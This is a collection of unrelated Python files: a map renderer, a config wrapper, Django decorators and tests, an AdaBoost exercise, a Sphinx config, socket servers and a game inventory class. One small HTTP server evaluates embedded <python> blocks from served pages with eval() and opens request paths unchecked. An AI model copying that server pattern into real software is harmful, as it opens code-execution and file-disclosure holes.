                # Horizontal segment (same row).
                if (newListColumns[x] < newListColumns[x+1]):
                    for z in range((newListColumns[x]*100) + 50, (newListColumns[x+1] * 100) + 60):
                        for y in range((newListRows[x]*100) + 50, (newListRows[x]*100)+60):
                            if roaming:
                                pix[z,y] = (255,0,0)
                            else:
                                pix[z,y] = (0,100,0)
                else:
                    for z in range((newListColumns[x+1]*100) + 50, (newListColumns[x] * 100) + 60):
                        for y in range((newListRows[x]*100) + 50, (newListRows[x]*100)+60):
                            if roaming:
                                pix[z,y] = (255,0,0)
                            else:
                                pix[z,y] = (0,100,0)
            else:
                # Vertical segment (rows differ).
                if (newListRows[x] < newListRows[x+1]):
                    for z in range((newListRows[x] * 100) + 50, (newListRows[x+1] * 100) + 50):
                        for y in range((newListColumns[x]*100)+50, (newListColumns[x]*100)+60):
                            if roaming:
                                pix[y,z] = (255,0,0)
                            else:
                                pix[y,z] = (0,100,0)
                else:
                    for z in range((newListRows[x+1] * 100) + 50, (newListRows[x] * 100) + 50):
                        for y in range((newListColumns[x]*100)+50, (newListColumns[x]*100)+60):
                            if roaming:
                                pix[y,z] = (255,0,0)
                            else:
                                pix[y,z] = (0,100,0)
        except:
            # Bare except kept: the last tile has no successor (IndexError).
            pass
    picture.load()
    picture.save(r'mapimages/map.jpg')
|
import os
import sys
from subprocess import run, PIPE
class ImageParser(object):
    """Thin wrapper around the external `confread`/`confwrite` utilities for
    reading and writing sections of a task image/config file."""

    def __init__(self, image_file):
        """Remember the config path, rejecting paths that do not exist."""
        if not os.path.exists(image_file):
            raise AttributeError("Incorrect image file. Image file not exists.")
        self.config_name = image_file

    def __read__(self, section, param=None):
        """Run `confread` for a section (and optional param); exit on failure."""
        command = ["confread", self.config_name, section]
        if param:
            command.append(param)
        proc = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True)
        if proc.returncode != 0:
            sys.exit(proc.returncode)
        return proc.stdout

    def write(self, section, param, value):
        """Run `confwrite` to set section/param to value; exit on failure."""
        command = ["confwrite", self.config_name, section, param, value]
        proc = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True)
        if proc.returncode != 0:
            sys.exit(proc.returncode)

    def _section_as_dict(self, section):
        """Parse 'key = value' lines of a section into a dict."""
        mapping = {}
        for line in self.__read__(section).strip().split("\n"):
            pieces = line.split("=")
            mapping[pieces[0].strip()] = pieces[1].strip()
        return mapping

    def get_cont_by_hostname(self, host):
        """Map a hostname to its container via the 'Containers' section."""
        return self._section_as_dict('Containers')[host]

    @property
    def nodes(self):
        """Dict of the 'Nodes' section."""
        return self._section_as_dict('Nodes')

    @property
    def task_name(self):
        return self.__read__("General", "job_id").strip()

    @property
    def user(self):
        return self.__read__("General", "user").strip()

    @property
    def group(self):
        return self.__read__("General", "group").strip()

    @property
    def docker_image_file(self):
        return self.__read__("Docker", "docker_image_file").strip()

    @property
    def docker_image(self):
        return self.__read__("Docker", "docker_image").strip()

    @property
    def docker_command(self):
        return self.__read__("Docker", "docker_command").strip()

    @property
    def docker_hostsfile(self):
        return self.__read__("Docker", "hostsfile").strip()

    @property
    def first_host(self):
        """Hostname of the first entry in the 'Nodes' section."""
        return self.__read__('Nodes').split()[0].split('=')[0]
if __name__ == '__main__':
    # Smoke test. BUGFIX: the original called ImageParser() and
    # get_cont_by_hostname() with their required arguments missing, so it
    # always raised TypeError; take them from the command line instead.
    a = ImageParser(sys.argv[1])
    print(a.nodes)
    # print(a.group)
    # print(a.task_name)
    # print(a.user)
    # print(a.docker_image)
    # print(a.docker_image_file)
    # print(a.docker_command)
    if len(sys.argv) > 2:
        # Optional hostname argument for the container lookup.
        print(a.get_cont_by_hostname(sys.argv[2]))
|
from r2.lib import amqp, websockets
from reddit_liveupdate.models import ActiveVisitorsByLiveUpdateEvent
def broadcast_update():
    """Broadcast the current visitor count of every live event over websockets."""
    event_ids = ActiveVisitorsByLiveUpdateEvent._cf.get_range(
        column_count=1, filter_empty=False)
    for event_id, is_active in event_ids:
        if is_active:
            count, is_fuzzed = ActiveVisitorsByLiveUpdateEvent.get_count(
                event_id, cached=False)
        else:
            count, is_fuzzed = 0, False
        websockets.send_broadcast(
            "/live/" + event_id,
            type="activity",
            payload={"count": count, "fuzzed": is_fuzzed},
        )
    # ensure that all the amqp messages we've put on the worker's queue are
    # sent before we allow this script to exit.
    amqp.worker.join()
|
# list = [1,2,'google']
# print(list)
#
# print(list[2])
#
# print(list[1:])
#
# list.append(40)
# print(list)
#
# list.remove('google')
# print(list)
#
# print(max(list))
# print(min(list))
# list.append(0)
# print(list)
# list.sort()
# print(list)
#
# list.sort(reverse=True)
# print(list)
# List-operations demo. BUGFIX: renamed the variable from `list`, which
# shadowed the builtin list type for the rest of the module.
countries = ["India", "Nepal", "China"]
print(countries)
countries.append("Sri Lanka")
print(countries)
del countries[1]
print(countries)
countries.insert(1, 'Bhutan')
print(countries)
# -*- encoding: utf-8 -*-
""" Template testing suite for Application_2 - this is the TESTING SUITE, all tests are run from here """
import poc_simpletest # imports testing engine
import _04_Application_2 as app_2 # imports the algorithms we are going to test
import alg_upa_trial as upa
import alg_module2_graphs as test_graphs # http://storage.googleapis.com/codeskulptor-alg/alg_module2_graphs.py
def run_suite(): # here we only pass a class reference, from which we are going to create an object later on
    """Informal test suite for the Application_2 module: exercises the
    provided graph functions, the UPA trial class and the fast targeted-order
    implementation, then reports pass/fail counts."""
    print("\nSTARTING TESTS:")
    suite = poc_simpletest.TestSuite() # create a TestSuite object
    # 1. check the provided functions directly
    suite.run_test(app_2.targeted_order({0: set([1, 2, 3]), 1: set([0, 2, 3]), 2: set([0, 1, 3]), 3: set([0, 1, 2])}), [0, 1, 2, 3], "Test #1a: 'targeted_order' method") # all nodes are of same degree so returned the nodes from 0 to 3
    suite.run_test(app_2.targeted_order({0: set([3]), 1: set([2, 3]), 2: set([1, 3]), 3: set([0, 1, 2])}), [3, 1, 0, 2], "Test #1b: 'targeted_order' method") # after deleting node 3 and 1 there are only empty nodes left
    # 2. check the basic functions directly
    suite.run_test(app_2.random_ugraph(4, 1), {0: set([1, 2, 3]), 1: set([0, 2, 3]), 2: set([0, 1, 3]), 3: set([0, 1, 2])}, "Test #2a: 'random_digraph' method")
    suite.run_test(app_2.random_ugraph(4, 0), {0: set([]), 1: set([]), 2: set([]), 3: set([])}, "Test #2b: 'random_digraph' method")
    suite.run_test(app_2.compute_edges({0: set([1, 2, 3]), 1: set([0, 2, 3]), 2: set([0, 1, 3]), 3: set([0, 1, 2])}), 6, "Test #2c: 'compute_edges' method")
    suite.run_test(app_2.compute_edges({0: set([1, 2, 3, 4]), 1: set([0, 2, 3, 4]), 2: set([0, 1, 3, 4]), 3: set([0, 1, 2, 4]), 4: set([0, 1, 2, 3])}), 10, "Test #2d: 'compute_edges' method")
    suite.run_test(app_2.compute_edges({0: set([1, 2, 3, 4, 5]), 1: set([0, 2, 3, 4, 5]), 2: set([0, 1, 3, 4, 5]), 3: set([0, 1, 2, 4, 5]), 4: set([0, 1, 2, 3, 5]), 5: set([0, 1, 2, 3, 4])}), 15, "Test #2e: 'compute_edges' method")
    # 3. Testing basic functionality of the UPA CLASS
    suite.run_test(upa.UPATrial(3)._node_numbers, [0, 0, 0, 1, 1, 1, 2, 2, 2], "Test #3a: 'self._node_numbers' property")
    suite.run_test(upa.UPATrial(4)._node_numbers, [0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3], "Test #3b: 'self._node_numbers' property")
    suite.run_test_in_range_multi(upa.UPATrial(3).run_trial(2), [0, 1, 2], "Test #3c: 'run_trial' method")
    # 4. check the basic functions directly
    suite.run_test(len(app_2.UPA(4, 2)), 4, "Test #4a: 'UPA' method") # here we just check if we get the total 'n' amount of nodes
    suite.run_test(len(app_2.random_order({0: set([]), 1: set([]), 2: set([]), 3: set([])})), 4, "Test #4b: 'random_order' method")
    # 5. check the basic functions directly
    suite.run_test(app_2.targeted_order_fast({0: set([3]), 1: set([2, 3]), 2: set([1, 3]), 3: set([0, 1, 2])}), [3, 1, 0, 2], "Test #5a: 'targeted_order_fast' method")
    suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH2), [1, 3, 5, 7, 8, 2, 4, 6], "Test #5b: 'targeted_order_fast' method")
    suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH5), ['banana', 'dog', 'cat', 'monkey', 'ape'], "Test #5c: 'targeted_order_fast' method")
    # Cross-check fast vs reference implementation on the larger graphs.
    suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH8), app_2.targeted_order(test_graphs.GRAPH8), "Test #5d: 'targeted_order_fast' method")
    suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH9), app_2.targeted_order(test_graphs.GRAPH9), "Test #5e: 'targeted_order_fast' method")
    # NOTE(review): #5g repeats #5f on GRAPH10 -- likely meant another graph.
    suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH10), app_2.targeted_order(test_graphs.GRAPH10), "Test #5f: 'targeted_order_fast' method")
    suite.run_test(app_2.targeted_order_fast(test_graphs.GRAPH10), app_2.targeted_order(test_graphs.GRAPH10), "Test #5g: 'targeted_order_fast' method")
    # 6. report number of tests and failures
    suite.report_results()

run_suite()
|
from django.contrib.auth.models import User
from django.http import HttpResponseForbidden
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from base_groups.models import BaseGroup, GroupMember
from communities.models import Community
from siteutils.shortcuts import get_object_or_none
class chapter_president_required(object):
    """
    Decorator class: allow access only to the chapter president of the
    chapter named by ``group_slug`` (or to users with base_groups module
    permissions, who bypass the check).

    Requires that group_slug is first non-request argument. Used with BaseGroup.
    Assumptions:
    - you can only be an exec member of one chapter
    - if you are on the chapter presidents' list, and are an exec of a given
      chapter, then you are chapter president of that chapter
    """
    def __call__(self, f):
        from functools import wraps

        @wraps(f)  # fix: preserve the view's __name__/__doc__ for debugging & introspection
        def newf(request, *args, **kwargs):
            user = request.user
            # Users with module-level perms (e.g. site admins) always pass.
            if user.has_module_perms("base_groups"):
                return f(request, *args, **kwargs)
            # slug comes from kwargs, else from the first positional arg.
            group_slug = kwargs.get('group_slug', None) or (len(args) > 0 and args[0])
            if not user.is_authenticated():
                # deny access - would set this to redirect
                # to a custom template eventually
                return render_to_response('denied.html', context_instance=RequestContext(request))
            group = get_object_or_404(BaseGroup, slug=group_slug)
            if group.model == 'Network':
                if group.network.user_is_president(user):
                    return f(request, *args, **kwargs)
            # Not a network, or not president of this network: deny.
            return render_to_response('denied.html', context_instance=RequestContext(request))
        return newf
class chapter_exec_required(object):
    """
    Decorator class: allow access only to users who are an exec of any
    chapter (members of the 'exec' Community), or who hold base_groups
    module permissions.
    """
    def __call__(self, f):
        from functools import wraps

        @wraps(f)  # fix: preserve the view's __name__/__doc__ for debugging & introspection
        def newf(request, *args, **kwargs):
            user = request.user
            # Users with module-level perms (e.g. site admins) always pass.
            if user.has_module_perms("base_groups"):
                return f(request, *args, **kwargs)
            if not user.is_authenticated():
                # deny access - would set this to redirect
                # to a custom template eventually
                return render_to_response('denied.html', context_instance=RequestContext(request))
            # Membership in the 'exec' community marks a chapter exec.
            execlist = get_object_or_none(Community, slug='exec')
            if execlist and execlist.user_is_member(user):
                return f(request, *args, **kwargs)
            return render_to_response('denied.html', context_instance=RequestContext(request))
        return newf
|
from django.test import TestCase
from django.test.client import Client
from django.utils import timezone
class TestEntryView(TestCase):
    """Integration tests for the mood-entry API endpoint at /api."""

    def setUp(self):
        self.client = Client()
        self.entry_title = 'Jimi hendrix sunshine of your love'
        self.entry = "It's getting near dawn,When lights close their tired eyes.I'll soon be with you my love," \
                     "To give you my dawn surprise.I'll be with you darling soon,I'll be with you when the stars " \
                     "start falling.I've been waiting so longTo be where I'm goingIn the sunshine of your love.I'm " \
                     "with you my love,The light's shining through on you.Yes, I'm with you my love,It's the morning " \
                     "and just we two.I'll stay with you darling now,I'll stay with you till my seas are dried up."
        self.color_1 = ' 1'
        self.color_2 = '2 '
        self.color_3 = ' 3'
        self.pub_date = timezone.now()

    # TEST TO MAKE SURE THE POST REQUEST IS WORKING
    def test_mood_generator_POST_new_mood(self):
        response = self.client.post('/api', {
            'entry_title': self.entry_title,
            'entry': self.entry,
            'gradient_color_stop_1': self.color_1,
            # fix: stops 2 and 3 previously reused color_1 (copy-paste),
            # leaving color_2/color_3 fixtures unused
            'gradient_color_stop_2': self.color_2,
            'gradient_color_stop_3': self.color_3,
            'pub_date': self.pub_date,
        })
        # CHECK TO MAKE SURE ENTRY WAS CREATED RESPONSE
        # fix: assertEquals is a deprecated alias of assertEqual
        self.assertEqual(response.status_code, 201)
        # TODO / FIND OUT WHY PYCHARM TEST DIFFER FROM TERMINAL
        # self.assertEqual(response.data['gradient_color_stop_3'], '#1cc13a')

    def test_mood_generator_GET_all_mood(self):
        response = self.client.get('/api')
        self.assertEqual(response.status_code, 200)
|
# -*- coding: utf-8 -*-
# @Time : 2017/4/13 16:30
# @Author : UNE
# @Site :
# @File : AdaBoosw.py
# @Software: PyCharm
# 《机器学习》(周志华)第八章8.3
"""
编程实现AdaBoosw,以不剪枝决策树为基学习器,在西瓜数据集3.0å上训练一个AdaBoosw集成,并于图8.4作比较
"""
from tool import readxls
import numpy as np
import pandas as pd
from dTree import dTree
# NOTE: Python 2 source (print statements). AdaBoost with decision-tree
# base learners on the watermelon 3.0a dataset ("Machine Learning",
# Zhou Zhihua, section 8.3, fig. 8.4 comparison).
if __name__ == '__main__':
    # Rows 6-7 of the sheet are the two features (density, sugar content),
    # row 8 is the class label -- TODO confirm against the xlsx layout.
    data = readxls.excel_table_byname("/Users/JJjie/Desktop/Projects/dataset/西瓜3.xlsx", 0, "Sheet1")
    x = pd.DataFrame(data[6:8])
    y = pd.DataFrame(data[8])
    y = y.T
    y_index = y - 1
    y = -2 * y + 3  # map labels {1, 2} onto {1, -1}
    try:  # handle the one-dimensional-array case
        m, n = y.shape
    except:
        m = 1
        n = len(y)
    # NOTE(review): 'set' shadows the builtin; kept for byte-compatibility.
    set = np.arange(0, n)
    sy = np.zeros((1,17))  # running (weighted) vote of the ensemble per sample
    sw = np.ones((1, 17)) / 17  # sample weights, initially uniform
    fenlei = ['√', '×']  # display symbols for the two classes
    shuxing = ['密度', '含糖率']  # attribute names: density, sugar content
    # Res records the cumulative classifier's prediction after each round,
    # plus the chosen split attribute and threshold.
    Res = pd.DataFrame(np.zeros((12,19)),dtype=object,
                       index=[1,2,3,4,5,6,7,8,9,10,11,12],
                       columns=[[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,'分类属性','阈值'],
                                [fenlei[int(y_index[i])] for i in y_index] + ['无','无']])
    for i in range(12):  # train 12 boosting rounds
        Tree = np.zeros((1,100))
        Ptr = 0
        Py = np.zeros((1,17))
        # build the unpruned decision-tree base learner on current weights
        dtree = dTree(x, y, Py, Ptr, Tree)
        # grow the tree; returns the root's best attribute index and threshold
        minn, threshold = dtree.TreeGenerate(0, set, sw, 1)
        Py = dtree.Py
        print minn, threshold
        # weighted training error of this round's learner
        er = sum(np.dot((Py != y), sw.T))
        if er > 0.5 :
            break  # AdaBoost stops once a learner is worse than chance
        a = 0.5 * np.log((1 - er) / er)  # learner weight (alpha)
        # reweight samples: up-weight mistakes, down-weight correct ones
        sw = sw * (np.exp(a * ((Py != y) * 2) - 1).values)
        sw = sw / sum(sw[0])  # renormalize to a distribution
        sy = sy + a * Py  # accumulate the weighted vote
        for j in range(17):
            Res.iloc[i, j] = fenlei[int((1 - np.sign(sy[0][j]))/2)]
        Res.iloc[i, 17] = shuxing[minn]
        Res.iloc[i, 18] = threshold
    print Res
# -*- coding: utf-8 -*-
#
import inspect
import sys
import os
import sphinx.environment
from docutils.utils import get_source_line
# from mock import Mock as MagicMock
from sphinx.ext.autodoc import cut_lines
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../..'))
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('/usr/local/lib/python3.7/site-packages'))
# -- General configuration ------------------------------------------------
project = 'brutils'
# copyright = '2018, Amelia Brown'
author = 'Amelia Brown'
#
#
# # on_rtd is whether we are on readthedocs.org
# on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
#
# if not on_rtd: # only import and set the theme if we're building docs locally
# import sphinx_rtd_theme
# html_theme = 'sphinx_rtd_theme'
# html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# html_theme = 'python_docs_theme'
# html_theme = 'sphinx_rtd_theme'
# sys.path.insert(0, os.path.abspath('../sphinx_src'))
# import sphinx_scipy_theme
# themedir = os.path.abspath('../sphinx_src')
# html_theme = 'sphinx_scipy_theme'
# html_theme_path = [themedir]
# html_theme_path = [python_docs]
html_theme = 'nature'
#
#
# html_theme_options = {
# "edit_link": False,
# "sidebar": "left",
# "scipy_org_logo": False,
# "rootlinks": []
# }
# html_sidebars = {'index': ['indexsidebar.html', 'searchbox.html']}
#
# html_additional_pages = {
# 'index': 'indexcontent.html',
# }
# html_title = "%s v%s Manual" % (project, version)
# html_static_path = ['sphinx_scipy_theme/static']
# html_last_updated_fmt = '%b %d, %Y'
#
# html_use_modindex = True
# html_copy_source = False
# html_domain_indices = False
# html_file_suffix = '.html'
#
# Sphinx extensions used by this documentation build.
extensions = [
    'sphinx.ext.autodoc',
    # 'sphinx_autodoc_annotation',
    'sphinx.ext.doctest',
    'sphinx.ext.napoleon',
    # 'numpydoc',
    'sphinx.ext.todo',
    'sphinx.ext.mathjax',
    'sphinx.ext.graphviz',
    'sphinx.ext.intersphinx',
    'sphinx.ext.linkcode'
]

mathjax_path = ('https://cdn.mathjax.org/mathjax/latest/MathJax.js?'
                'config=TeX-AMS-MML_HTMLorMML')

# Cross-reference targets for external projects.
intersphinx_mapping = {
    'theano': ('http://theano.readthedocs.org/en/latest/', None),
    'numpy': ('http://docs.scipy.org/doc/numpy/', None),
    'scipy': ('http://docs.scipy.org/doc/scipy/reference/', None),
    'python': ('http://docs.python.org/3.7', None)
}

# autodoc: group members by type, merge class and __init__ docstrings,
# and include undocumented members by default.
autodoc_member_order = 'groupwise' #'bysource'
autoclass_content = 'both'
autodoc_default_flags = ['members','undoc-members']

# (A Mock-based stub for heavy imports was previously kept here for
# ReadTheDocs builds; removed as dead commented-out code.)

graphviz_dot_args = ['-Gbgcolor=#fcfcfc'] # To match the RTD theme
graphviz_output_format = 'svg' # To produce SVG figures

# Render todo lists
todo_include_todos = True

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# Do not prefix documented objects with their module path.
add_module_names=False

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
# project = u'Blocks'
# copyright = u'2014-2015, Université de Montréal'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# import blocks
# version = '.'.join(blocks.__version__.split('.')[:2])
# # The full version, including alpha/beta/rc tags.
# release = blocks.__version__

# Patterns to ignore when looking for source files.
exclude_patterns = ['_build']

# The name of the Pygments (syntax highlighting) style to use.
# html_static_path = ['_static']
#
#
# htmlhelp_basename = 'Blocksdoc'

# -- Options for LaTeX output ---------------------------------------------
def setup(app):
    """Sphinx extension hook: strip the first 2 lines of every module docstring."""
    app.connect('autodoc-process-docstring', cut_lines(2, what=['module']))
def linkcode_resolve(domain, info):
    """
    Determine the URL corresponding to a Python object.

    Called by sphinx.ext.linkcode with ``info = {'module': ..., 'fullname': ...}``.
    NOTE: the GitHub URL construction at the end is commented out, so this
    currently always returns None (no "source" links are emitted).
    """
    if domain != 'py':
        return None

    modname = info['module']
    fullname = info['fullname']

    submod = sys.modules.get(modname)
    if submod is None:
        return None

    # Walk dotted attribute path (e.g. 'Class.method') from the module.
    obj = submod
    for part in fullname.split('.'):
        try:
            obj = getattr(obj, part)
        except AttributeError:  # fix: was a bare except hiding real errors
            return None

    try:
        fn = inspect.getsourcefile(obj)
    except TypeError:  # builtins / C-implemented objects have no source file
        fn = None
    if not fn:
        return None

    try:
        source, lineno = inspect.findsource(obj)
    except (OSError, IOError, TypeError):  # source unavailable
        lineno = None

    if lineno:
        linespec = "#L%d" % (lineno + 1)
    else:
        linespec = ""

    # fn = os.path.relpath(fn, start=os.path.dirname(blocks.__file__))
    # github = "https://github.com/mila-udem/blocks/blob/master/blocks/{}{}"
    # return github.format(fn, linespec)
# Suppress "nonlocal image URI" warnings
# http://stackoverflow.com/questions/12772927
def _warn_node(self, msg, node, **kwargs):
    """Replacement for BuildEnvironment.warn_node that drops 'nonlocal image URI' warnings."""
    if not msg.startswith('nonlocal image URI found:'):
        self._warnfunc(msg, '%s:%s' % get_source_line(node), **kwargs)

# Monkey-patch Sphinx's build environment with the filtering warner above.
sphinx.environment.BuildEnvironment.warn_node = _warn_node
|
import socket

# Minimal one-shot TCP echo server: accept a single connection on
# 127.0.0.1:8080, print the received bytes as UTF-8, and echo them back.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with server:  # fix: the listening socket was never closed before
    server.bind(("127.0.0.1", 8080))
    server.listen(10)
    conn, addr = server.accept()
    with conn:  # 'with' closes the connection; the old explicit close() was redundant
        res = conn.recv(1024)
        print(res.decode("utf-8"))
        conn.send(res)
# SPDX-FileCopyrightText: 2020 - Sebastian Ritter <bastie@users.noreply.github.com>
# SPDX-License-Identifier: Apache-2.0
'''
Created on 01.09.2020
@author: Sͬeͥbͭaͭsͤtͬian
'''
from builtins import staticmethod
from java.nio.file.FileSystem import FileSystem
from java.lang.Object import Object
from java.nio.file.FileSystem import __vampire_DefaulFileSystem__
class FileSystems(Object):
    '''
    Factory class for file systems (Python port of java.nio.file.FileSystems).
    '''

    def __init__(self):
        '''
        Constructor (no per-instance state; the class only exposes static factories)
        '''

    @staticmethod
    def getDefault() -> FileSystem:
        # Return the default FileSystem implementation.
        # NOTE(review): the '__vampire_DefaulFileSystem__' spelling (missing 't')
        # matches the name imported from java.nio.file.FileSystem above.
        return __vampire_DefaulFileSystem__()
|
import socket # Import socket module
import os
from contextlib import redirect_stdout
def processrequest(request):
    """Extract the requested resource path from a raw HTTP request.

    Decodes *request* (bytes) as UTF-8 and returns the second
    space-separated token (the URL path), or "" if absent.
    """
    tokens = request.decode("utf-8").split(" ")
    resource = tokens[1] if len(tokens) > 1 else ""
    print(resource)
    return resource
def sendfile(filepath, conn):
    """
    Send the resource at *filepath* to socket *conn* as an HTTP/1.1 response.

    Picks a Content-Type from the file extension, serves index.html for
    directory-like paths, and for .html files evaluates an embedded
    <python>...</python> block server-side, splicing its stdout into the page.
    On any failure a bare 404 is sent instead.
    """
    img_type = ["ico", "jpg", "png", "gif"]
    vid_type = ["mp4"]
    l = b"""HTTP/1.1 200 OK"""
    filename = filepath.split("/")
    # Path ends in "/" -> trailing empty component -> serve its index.html.
    # (fix: the old check compared the whole split list to [], which
    # str.split can never produce, so the branch was dead.)
    if filename[-1] == "":
        filepath += "index.html"
        l += b"""\nContent-Type: text/html\n\n"""
    else:
        file_ext = filename[-1].split(".")
        if len(file_ext) == 1:
            # No extension: treat as a directory and serve its index.html.
            filepath += "index.html"
            l += b"""\nContent-Type: text/html\n\n"""
        else:
            # NOTE(review): keyed on the first extension component (file_ext[1]),
            # so 'a.min.css' resolves via 'min'; kept as original behavior.
            if file_ext[1] == "css":
                l += b"""\nContent-Type: text/css\n\n"""
            if file_ext[1] in img_type:
                l += f"""\nContent-Type: image/{file_ext[1]}\n\n""".encode("utf-8")
            if file_ext[1] in vid_type:
                l += f"""\nContent-Type: video/{file_ext[1]}\n\n""".encode("utf-8")
            # fix: 'file_ext[1] in "svg"' was a substring test, so extensions
            # like "s", "v" or "g" matched; same for 'in "js"'.
            if file_ext[1] == "svg":
                l += f"""\nContent-Type: image/svg+xml\n\n""".encode("utf-8")
            if file_ext[1] == "js":
                l += f"""\nContent-Type: text/javascript\n\n""".encode("utf-8")
    filename = filepath.split("/")
    file_ext = filename[-1].split(".")
    try:
        # filepath starts with "/", so [1:] makes it relative to the CWD.
        f = open(filepath[1:], 'rb')
        text = f.read()
        if file_ext[-1] == "html":
            start = text.find(b"<python>")
            # fix: only attempt the splice when a <python> block is present;
            # previously find() == -1 produced garbage slice offsets, eval()
            # raised, and every plain .html page was served as a 404.
            if start != -1:
                # SECURITY: eval() of page content executes arbitrary code;
                # only acceptable if the served tree is fully trusted.
                temp = text[:start]
                stop = text.find(b"</python>")
                pyth = text[start + len("<python>"):stop]
                pyth = pyth.replace(b" ", b"")
                s = pyth.decode()
                print(s)
                print(pyth)
                # Capture the expression's stdout via a temp file and splice it in.
                with open('help.txt', 'w+') as fr:
                    with redirect_stdout(fr):
                        eval(s)
                    fr.seek(0)
                    ev = fr.read()
                t = ev.encode()
                temp += t
                temp += text[stop:]
                text = temp
        l += text
        # Stream the rest of the file in 1 KiB chunks.
        while (l):
            conn.send(l)
            l = f.read(1024)
        f.close()
    except Exception as e:
        # Any failure (missing file, bad eval) degrades to a bare 404.
        l = b"""HTTP/1.1 404"""
        print(e)
        conn.send(l)
port = 12345                      # Reserve a port for your service.
s = socket.socket()               # Create a socket object
host = socket.gethostname()       # Get local machine name (unused; server binds to localhost below)
s.bind(("localhost", port))       # Bind to the port
s.listen(5)                       # Now wait for client connection.
print('Server listening....')

# Serve forever: one HTTP request per accepted connection.
while True:
    conn, addr = s.accept()       # Establish connection with client.
    print ('Got connection from', addr)
    data = conn.recv(1024)        # raw request bytes (assumed to fit in 1 KiB)
    res = processrequest(data)    # extract the requested resource path
    sendfile(res, conn)           # write the HTTP response
    print('Done sending')
    conn.close()
|
from ui.pages.inventory_page.SlotsGroup import SlotsGroup
from game_objects.items import ItemTransactions
class SlotMoveMaster:
    """Coordinates item movement between inventory, equipment and shop slots.

    ``moved_slot`` holds the slot currently being dragged (or None). All
    mutating operations run inside an ItemTransactions context on the hero.
    """

    def __init__(self, gameRoot, page):
        self.gameRoot = gameRoot
        self.page = page
        self.moved_slot = None  # slot currently picked up by the player
        self.emty_icon = 'cha_page_elemnt_bg.png'  # placeholder icon for emptied slots

    def move_equip_to_inventory(self, target_item):
        """Swap the dragged equipment slot into a same-type inventory slot."""
        target_slot = self.page.inventories.slots.get(target_item.name)
        if self.moved_slot is None or target_slot is None:
            return
        if target_slot.content is None:
            return
        if self.moved_slot.item_type == target_slot.content.item_type:
            self.swap_slot(target_slot)

    def move_inventory_to_equit(self, target_item):
        """Equip the dragged inventory slot into a matching equipment slot."""
        target_slot = self.page.equipments.slots.get(target_item.name)
        if self.moved_slot is None or target_slot is None:
            return
        if self.moved_slot.content.item_type != target_slot.item_type:
            return
        hero = self.gameRoot.lengine.the_hero
        with ItemTransactions(hero) as trans:
            state, msg = hero.equipment.equip(self.moved_slot)
            self.page.inventories.update_attr()
            self.page.equipments.update_attr()

    def move_inventory_to_inventory(self, target_item):
        """Swap the dragged slot with another inventory slot."""
        target_slot = self.page.inventories.slots.get(target_item.name)
        if self.moved_slot is None or target_slot is None:
            return
        self.swap_slot(target_slot)

    def equip(self, item):
        """Equip the item held in the inventory slot matching *item*."""
        slot = self.page.inventories.slots.get(item.name)
        if slot is None or slot.content is None:
            return
        hero = self.gameRoot.lengine.the_hero
        with ItemTransactions(hero) as trans:
            state, msg = hero.equipment.equip(slot)
            self.page.inventories.update_attr()
            self.page.equipments.update_attr()

    def unequip(self, item):
        """Unequip the equipment slot matching *item*, restoring its default icon."""
        slot = self.page.equipments.slots.get(item.name)
        if slot is None or slot.content is None:
            return
        hero = self.gameRoot.lengine.the_hero
        with ItemTransactions(hero) as trans:
            hero.equipment.unequip_slot(slot)
            if slot.content is None:
                item.setPixmapIcon(self.page.equipments.default_icons[item.name])

    def drop_slot(self):
        """Drop the entire dragged slot's content."""
        if self.moved_slot is None:
            return
        with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
            self.moved_slot.drop()
            self.page.inventories.update_attr()
            self.page.equipments.update_attr()

    def pop_item(self):
        """Remove a single item from the dragged slot."""
        if self.moved_slot is None:
            return
        with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
            self.moved_slot.pop_item()
            self.page.inventories.update_attr()

    def swap_slot(self, target_slot):
        """Exchange contents between the dragged slot and *target_slot*."""
        if self.moved_slot is None:
            return
        with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
            state = target_slot.swap_item(self.moved_slot)
            self.page.inventories.update_attr()
            self.page.equipments.update_attr()

    def buy(self, item):
        """Purchase the shop slot matching *item*; on success refresh gold and icon."""
        slot = self.page.shop.slots.get(item.name)
        if slot is None or slot.content is None:
            return
        with ItemTransactions(self.gameRoot.lengine.the_hero) as trans:
            self.gameRoot.game.shop.buy(slot)
            if slot.content is None:
                self.update_gold_count()
                self.page.inventories.update_attr()
                item.setPixmapIcon(self.emty_icon)

    def update_gold_count(self):
        """Refresh the hero-gold label from the shop customer's balance."""
        self.page.items['hero_gold_value'].setText(str(self.gameRoot.game.shop.customer.gold))
|
# Split a restaurant bill evenly among the diners (rounded to 2 decimals).
bill_price = int(input('Please enter bill total price : '))
number_of_diners = int(input('Please enter diners number : '))
share = round(bill_price / number_of_diners, 2)
print('the price for each person is {0}'.format(share))
|
""" Search cell """
import os
import torch
import torch.nn as nn
import numpy as np
import time
from tensorboardX import SummaryWriter
from config import SearchConfig
import utils
from models.search_cnn import SearchCNNController
from architect import Architect
from visualize import plot
from torchsampler import ImbalancedDatasetSampler
config = SearchConfig()           # parsed search/CLI configuration
device = torch.device("cuda")     # all tensors/models go to GPU

# tensorboard writer under <run path>/tb, with the config dumped as markdown
